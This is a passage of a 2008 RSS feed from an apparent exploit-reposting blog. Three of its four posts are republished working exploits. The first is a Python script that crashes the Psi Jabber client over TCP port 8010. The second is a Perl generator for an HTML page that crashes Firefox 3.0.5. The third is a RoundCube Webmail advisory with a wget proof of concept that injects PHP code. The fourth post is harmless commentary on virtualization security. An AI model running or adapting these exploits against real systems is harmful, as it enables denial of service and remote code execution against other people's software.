		<guid isPermaLink="false">http://h4xx0rs.wordpress.com/2008/12/23/psi-jabber-client-8010tcp-remote-denial-of-service-exploit-winlin/</guid>
		<description><![CDATA[#!/usr/bin/python #psi jabber client 8010/tcp remote denial of service (win &#38; lin) #by sha0[at]badchecksum.net #http://jolmos.blogspot.com import socket, sys sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: sock.connect((sys.argv[1],8010)) except: print 'Cannot connect!' sys.exit(1) try: sock.send('\x05\xff') print 'Crashed!' except: print 'Cannot send!' sock.close() # milw0rm.com [2008-12-23]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=h4xx0rs.wordpress.com&amp;blog=5943379&amp;post=11&amp;subd=h4xx0rs&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<pre>#!/usr/bin/python
#psi jabber client 8010/tcp remote denial of service (win &amp; lin)
#by sha0[at]badchecksum.net
#http://jolmos.blogspot.com

import socket, sys

sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
    sock.connect((sys.argv[1],8010))
except:
    print 'Cannot connect!'
    sys.exit(1)

try:
    sock.send('\x05\xff')
    print 'Crashed!'
except:
    print 'Cannot send!'

sock.close() 

# milw0rm.com [2008-12-23]</pre>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/h4xx0rs.wordpress.com/11/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/h4xx0rs.wordpress.com/11/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/h4xx0rs.wordpress.com/11/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/h4xx0rs.wordpress.com/11/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/h4xx0rs.wordpress.com/11/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/h4xx0rs.wordpress.com/11/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/h4xx0rs.wordpress.com/11/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/h4xx0rs.wordpress.com/11/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/h4xx0rs.wordpress.com/11/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/h4xx0rs.wordpress.com/11/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/h4xx0rs.wordpress.com/11/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/h4xx0rs.wordpress.com/11/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/h4xx0rs.wordpress.com/11/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/h4xx0rs.wordpress.com/11/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=h4xx0rs.wordpress.com&amp;blog=5943379&amp;post=11&amp;subd=h4xx0rs&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://h4xx0rs.wordpress.com/2008/12/23/psi-jabber-client-8010tcp-remote-denial-of-service-exploit-winlin/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/2ba556f2e82fc5d2fd2c8c9d0e3e25b2?s=96&#38;d=identicon" medium="image">
			<media:title type="html">x9169</media:title>
		</media:content>
	</item>
		<item>
		<title>Mozilla Firefox 3.0.5 location.hash Remote Crash Exploit</title>
		<link>http://h4xx0rs.wordpress.com/2008/12/23/mozilla-firefox-305-locationhash-remote-crash-exploit/</link>
		<comments>http://h4xx0rs.wordpress.com/2008/12/23/mozilla-firefox-305-locationhash-remote-crash-exploit/#comments</comments>
		<pubDate>Tue, 23 Dec 2008 23:01:40 +0000</pubDate>
		<dc:creator>x9169</dc:creator>
		
		<guid isPermaLink="false">http://h4xx0rs.wordpress.com/?p=9</guid>
		<description><![CDATA[#!/usr/bin/perl # mzff_lhash_dos.pl # Mozilla Firefox 3.0.5 location.hash Denial of Service Exploit # Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com] # Crash on Vista, play with it on XP $filename = $ARGV[0]; if(!defined($filename)) { print "Usage: $0 &#60;filename.html&#62;\n\n"; } $head = "&#60;html&#62;" . "\n" . "&#60;script type=\"text/javascript\"&#62;" . "\n"; $trig = "location.hash = \"" . "A" x 20000000 . [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=h4xx0rs.wordpress.com&amp;blog=5943379&amp;post=9&amp;subd=h4xx0rs&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<pre>#!/usr/bin/perl
# mzff_lhash_dos.pl
# Mozilla Firefox 3.0.5 location.hash Denial of Service Exploit
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
# Crash on Vista, play with it on XP

$filename = $ARGV[0];
if(!defined($filename))
{

     print "Usage: $0 &lt;filename.html&gt;\n\n";

}

$head = "&lt;html&gt;" . "\n" . "&lt;script type=\"text/javascript\"&gt;" . "\n";
$trig = "location.hash = \"" . "A" x 20000000 . "\";" . "\n";
$foot = "&lt;/script&gt;" . "\n" . "&lt;/html&gt;";

$data = $head . $trig . $foot;

     open(FILE, '&gt;' . $filename);
     print FILE $data;
     close(FILE);

exit;

# milw0rm.com [2008-12-23]</pre>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/h4xx0rs.wordpress.com/9/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/h4xx0rs.wordpress.com/9/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/h4xx0rs.wordpress.com/9/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/h4xx0rs.wordpress.com/9/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/h4xx0rs.wordpress.com/9/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/h4xx0rs.wordpress.com/9/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/h4xx0rs.wordpress.com/9/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/h4xx0rs.wordpress.com/9/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/h4xx0rs.wordpress.com/9/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/h4xx0rs.wordpress.com/9/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/h4xx0rs.wordpress.com/9/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/h4xx0rs.wordpress.com/9/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/h4xx0rs.wordpress.com/9/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/h4xx0rs.wordpress.com/9/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=h4xx0rs.wordpress.com&amp;blog=5943379&amp;post=9&amp;subd=h4xx0rs&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://h4xx0rs.wordpress.com/2008/12/23/mozilla-firefox-305-locationhash-remote-crash-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/2ba556f2e82fc5d2fd2c8c9d0e3e25b2?s=96&#38;d=identicon" medium="image">
			<media:title type="html">x9169</media:title>
		</media:content>
	</item>
		<item>
		<title>Virtualization Security &#8211; IT Managers and Security Experts Disagree</title>
		<link>http://h4xx0rs.wordpress.com/2008/12/23/virtualization-security-it-managers-and-security-experts-disagree/</link>
		<comments>http://h4xx0rs.wordpress.com/2008/12/23/virtualization-security-it-managers-and-security-experts-disagree/#comments</comments>
		<pubDate>Tue, 23 Dec 2008 23:00:19 +0000</pubDate>
		<dc:creator>x9169</dc:creator>
				<category><![CDATA[news]]></category>

		<guid isPermaLink="false">http://h4xx0rs.wordpress.com/?p=7</guid>
		<description><![CDATA[A lot of companies are moving towards virtualization, blade servers and sharing hardware components makes sense when you can have multiple logical servers on one physical machine. I’ve used VMWare in a few situations myself but mostly I don’t see a real requirement for using virtual machines (apart from hosting with a VPS). There have [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=h4xx0rs.wordpress.com&amp;blog=5943379&amp;post=7&amp;subd=h4xx0rs&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>A lot of companies are moving towards virtualization, blade servers and sharing hardware components makes sense when you can have multiple logical servers on one physical machine. I’ve used VMWare in a few situations myself but mostly I don’t see a real requirement for using virtual machines (apart from hosting with a VPS).</p>
<p>There have always been debates about the security, it’s harder to segregate as the virtual machines are somehow attached at the system level so if you can break out of the ‘jail’ (into the ‘hypervisor’) you can effectively access everything on that physical server. There is still a lot of skepticism about the security of virtual servers and the big 3 providers (VMWare, Citrix Xen and Microsoft) are apparently working on some new security solutions, but as they haven’t been released yet you better be careful.</p>
<p><!--adsense#New468--></p>
<blockquote><p>Does transitioning to virtualization increase security risks within a company? IT managers appear to be at loggerheads with IT security professionals over that question, even while sharing similar opinions on where risks might lie, according to a new survey.</p>
<p>The 2009 Security Mega Trends Survey from research firm Ponemon Institute — which also looked at attitudes on other topics, such as outsourcing and Web 2.0 technologies — shows roughly two-thirds of IT operations staff who responded said they felt virtualization of computer resources did not increase information-security risks. But about two-thirds of information security professionals surveyed felt the opposite way.</p>
<p>A full three-quarters of the survey’s 1,402 respondents, all active in U.S.-based private sector firms or government agencies, said their organizations had already implemented virtualization of their computer resources, with about 90% in both the IT and security camps saying they were “familiar” or “very familiar” with virtualization</p></blockquote>
<p>It’s strange to see the opinions are almost polarized and exactly opposite, 2/3s of managers think that virtualization does not increase risk but 2/3s of security pros think that it does. I’d personally have to say it does increase risk, especially at the moment where it’s still quite a new technology and the implementation and security measures are not mature yet.</p>
<p>Stay away from virtualization for extremely data critical operations.</p>
<p><!--adsense#New468--></p>
<blockquote><p>The survey reflects the often upbeat attitudes about virtualization expressed by experienced IT pros about how the technology, most commonly that of VMware, Microsoft of Citrix Xen, is bringing them the benefit of server consolidation.</p>
<p>“We started virtualization in a development and test environment, and now the main applications we have using VMware in production instances are file and print servers,” says Rich Wagner, director of IT infrastructure at Columbus, Ohio-based Hexion Specialty Chemicals. Wagner says virtualization hasn’t raised red flags as far as security requirements. The main concern, he says, is “from a performance standpoint — the CPU and memory and disk I/O — in sharing a large box,” with database servers seen as a resource-intensive application that might not be well-suited for virtualization.</p>
<p>There’s a far more skeptical view of virtualization security often expressed by seasoned IT security pros, who harbor doubts that vendors on the virtualization front have really sorted out or addressed the risks associated with the underlying hypervisor transformation.</p></blockquote>
<p>I agree it’s definitely best for a testing/staging situation where you can set up multiple different environments concurrently on the same piece of hardware without having to reboot.</p>
<p>It’s great in a development environment too if you need to test a piece of code on multiple operating systems with different specifications.</p>
<p>But as I said above, for CPU intensive activities and for servers that hold critical data I just don’t think it’s a good idea.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/h4xx0rs.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/h4xx0rs.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/h4xx0rs.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/h4xx0rs.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/h4xx0rs.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/h4xx0rs.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/h4xx0rs.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/h4xx0rs.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/h4xx0rs.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/h4xx0rs.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/h4xx0rs.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/h4xx0rs.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/h4xx0rs.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/h4xx0rs.wordpress.com/7/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=h4xx0rs.wordpress.com&amp;blog=5943379&amp;post=7&amp;subd=h4xx0rs&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://h4xx0rs.wordpress.com/2008/12/23/virtualization-security-it-managers-and-security-experts-disagree/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/2ba556f2e82fc5d2fd2c8c9d0e3e25b2?s=96&#38;d=identicon" medium="image">
			<media:title type="html">x9169</media:title>
		</media:content>
	</item>
		<item>
		<title>RoundCube Webmail &lt;= 0.2-3 beta Code Execution Vulnerability</title>
		<link>http://h4xx0rs.wordpress.com/2008/12/23/roundcube-webmail-02-3-beta-code-execution-vulnerability/</link>
		<comments>http://h4xx0rs.wordpress.com/2008/12/23/roundcube-webmail-02-3-beta-code-execution-vulnerability/#comments</comments>
		<pubDate>Tue, 23 Dec 2008 22:56:36 +0000</pubDate>
		<dc:creator>x9169</dc:creator>
				<category><![CDATA[web apps]]></category>

		<guid isPermaLink="false">http://h4xx0rs.wordpress.com/?p=5</guid>
		<description><![CDATA[Public Release Date of POC: 2008-12-22 Author: Jacobo Avariento Gimeno (Sofistic) CVE id: CVE-2008-5619 Bugtraq id: 32799 Severity: Critical Vulnerability reported by: RealMurphy Intro ---- Roundcube Webmail is a browser-based IMAP client that uses "chuggnutt.com HTML to Plain Text Conversion" library to convert HTML text to plain text, this library uses the preg_replace PHP function [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=h4xx0rs.wordpress.com&amp;blog=5943379&amp;post=5&amp;subd=h4xx0rs&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<pre>Public Release Date of POC: 2008-12-22
Author: Jacobo Avariento Gimeno (Sofistic)
CVE id: CVE-2008-5619
Bugtraq id: 32799
Severity: Critical
Vulnerability reported by: RealMurphy

Intro
----
Roundcube Webmail is a browser-based IMAP client that uses
"chuggnutt.com HTML to Plain Text Conversion" library to convert
HTML text to plain text, this library uses the preg_replace PHP
function in an insecure manner.

Vulnerable versions:
Round Cube RoundCube Webmail 0.2-3 beta
Round Cube RoundCube Webmail 0.2-1 alpha (tested)

Analysis of the vulnerable code
----
The script bin/html2text.php creates an instance of the class html2text
with the given POST data, the problem arises in the file
program/lib/html2text.php in function _convert() on line 381:

        // Run our defined search-and-replace
        $text = preg_replace($this-&gt;search, $this-&gt;replace, $text);

Some patterns in $this-&gt;search allow interpret PHP code using the "e"
flag, i.e.:
'/&lt;a [^&gt;]*href=("|\')([^"\']+)\1[^&gt;]*&gt;(.+?)&lt;\/a&gt;/ie', // &lt;a href=""&gt;
'/&lt;b[^&gt;]*&gt;(.+?)&lt;\/b&gt;/ie',                // &lt;b&gt;
'/&lt;th[^&gt;]*&gt;(.+?)&lt;\/th&gt;/ie',              // &lt;th&gt; and &lt;/th&gt;

In concrete those would be replaced by:
'$this-&gt;_build_link_list("\\2", "\\3")', // &lt;a href=""&gt;
'strtoupper("\\1")',                    // &lt;b&gt;
"strtoupper(\"\t\t\\1\n\")",            // &lt;th&gt; and &lt;/th&gt;

Now using PHP complex (curly) syntax we can take advantage of this to
interpret arbitrary PHP code, evaluating PHP code embedded inside
strings.

Proof of Concept
----
As this vulnerability was discovered in-the-wild:
http://trac.roundcube.net/ticket/1485618 was quite sure that would be
exploitable, using PHP curly we can execute phpinfo():

wget -q --header="Content-Type: ''" \
-O - --post-data='&lt;b&gt;{${phpinfo()}}&lt;/b&gt;' \
--no-check-certificate \
http://127.0.0.1/roundcubemail-0.2-alpha/bin/html2text.php

Using PHP curly syntax plus some tricks to bypass PHP magic_quotes_gpc
to avoid using single or double quotes the arbitrary shell command
execution is fully feasible. As this vulnerability was discovered last
week no more details will be published yet, more info will be available
at http://sofistic.net.

-- Jacobo Avariento Gimeno IT Security Department @ Sofistic Your security, our concern! http://sofistic.net 

# milw0rm.com [2008-12-22]</pre>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/h4xx0rs.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/h4xx0rs.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/h4xx0rs.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/h4xx0rs.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/h4xx0rs.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/h4xx0rs.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/h4xx0rs.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/h4xx0rs.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/h4xx0rs.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/h4xx0rs.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/h4xx0rs.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/h4xx0rs.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/h4xx0rs.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/h4xx0rs.wordpress.com/5/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=h4xx0rs.wordpress.com&amp;blog=5943379&amp;post=5&amp;subd=h4xx0rs&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://h4xx0rs.wordpress.com/2008/12/23/roundcube-webmail-02-3-beta-code-execution-vulnerability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/2ba556f2e82fc5d2fd2c8c9d0e3e25b2?s=96&#38;d=identicon" medium="image">
			<media:title type="html">x9169</media:title>
		</media:content>
	</item>
	</channel>
</rss>
